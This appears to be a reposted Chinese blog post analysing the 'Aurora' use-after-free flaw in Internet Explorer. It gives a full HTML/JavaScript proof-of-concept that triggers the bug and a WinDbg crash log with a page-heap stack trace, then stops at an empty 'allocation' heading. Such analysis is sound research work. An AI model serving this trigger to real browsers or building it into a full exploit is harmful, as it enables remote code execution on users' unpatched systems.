标签:
传说中的极光漏洞
Microsoft Internet Explorer非法事件操作内存破坏漏洞
Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。
Microsoft Internet Explorer在处理非法的事件操作时存在内存破坏漏洞。由于在创建对象以后没有增加相应的访问记数,恶意的对象操作流程可能导致指针指向被释放后重使用的内存,远程攻击者可通过诱使用户访问恶意网页非法操作内存在用户系统上执行指令。
POC如下
<html> <head> <script> var obj, event_obj; function ev1(evt) { event_obj = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 1); } function ev2() { var data, tmp; data = ""; tmp = unescape("%u0a0a%u0a0a"); for (var i = 0 ; i < 4 ; i++) data += tmp; for (i = 0 ; i < obj.length ; i++ ) { obj[i].data = data; } event_obj.srcElement; } obj = new Array(); event_obj = null; for (var i = 0; i < 200 ; i++ ) obj[i] = document.createElement("COMMENT"); </script> </head> <body> <span id="sp1"> <img src="aurora.gif" onload="ev1(event)"> </span> </body> </html>
没能找到合适的POC,这个是我用网上的exp修改来的,有些繁琐。
开门见山,直接看出了是CBody对象发生的UAF
1:020> g (c60.b2c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=04f8ef08 ebx=ffffffff ecx=07540fc8 edx=041bf0f4 esi=07540fc8 edi=06c64fb0 eip=6837c400 esp=041bf0e4 ebp=041bf0fc iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CElement::Doc: 6837c400 8b01 mov eax,dword ptr [ecx] ds:0023:07540fc8=???????? 1:020> !heap -p -a ecx address 07540fc8 found in _DPH_HEAP_ROOT @ 1b1000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 7db21d4: 7540000 2000 702290b2 verifier!AVrfDebugPageHeapFree+0x000000c2 77285674 ntdll!RtlDebugFreeHeap+0x0000002f 77247aca ntdll!RtlpFreeHeap+0x0000005d 77212d68 ntdll!RtlFreeHeap+0x00000142 7710f1ac kernel32!HeapFree+0x00000014 683e0fa4 mshtml!CBodyElement::`scalar deleting destructor‘+0x00000022 68387dd0 mshtml!CBase::SubRelease+0x00000022 6837c482 mshtml!CElement::PrivateRelease+0x0000002a 6837b034 mshtml!PlainRelease+0x00000025 683d669d mshtml!PlainTrackerRelease+0x00000014 6bd0a6f1 jscript!VAR::Clear+0x0000005f 6bd26d66 jscript!GcContext::Reclaim+0x000000b6 6bd24309 jscript!GcContext::CollectCore+0x00000123 6bd24a4a jscript!CScriptRuntime::Run+0x000039dc 6bd15c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce 6bd15bfb jscript!ScrFncObj::Call+0x0000008d 6bd15e11 jscript!CSession::Execute+0x0000015f 6bd0f3ee jscript!NameTbl::InvokeDef+0x000001b5 6bd0ea2e jscript!NameTbl::InvokeEx+0x0000012c 6bd096de jscript!NameTbl::Invoke+0x00000070 6834aa7b mshtml!CWindow::ExecuteTimeoutScript+0x00000087 6834ab66 mshtml!CWindow::FireTimeOut+0x000000b6 68376af7 mshtml!CStackPtrAry<unsigned long,12>::GetStackSize+0x000000b6 68371e57 mshtml!GlobalWndProc+0x00000183 76c686ef USER32!InternalCallWinProc+0x00000023 76c68876 USER32!UserCallWinProcCheckWow+0x0000014b 76c689b5 USER32!DispatchMessageWorker+0x0000035e 76c68e9c USER32!DispatchMessageW+0x0000000f 6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452 6ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c1 76a749bd iertutil!CIsoScope::RegisterThread+0x000000ab 77111174 kernel32!BaseThreadInitThunk+0x0000000e
分配
标签:
原文地址:http://www.cnblogs.com/Ox9A82/p/5837769.html
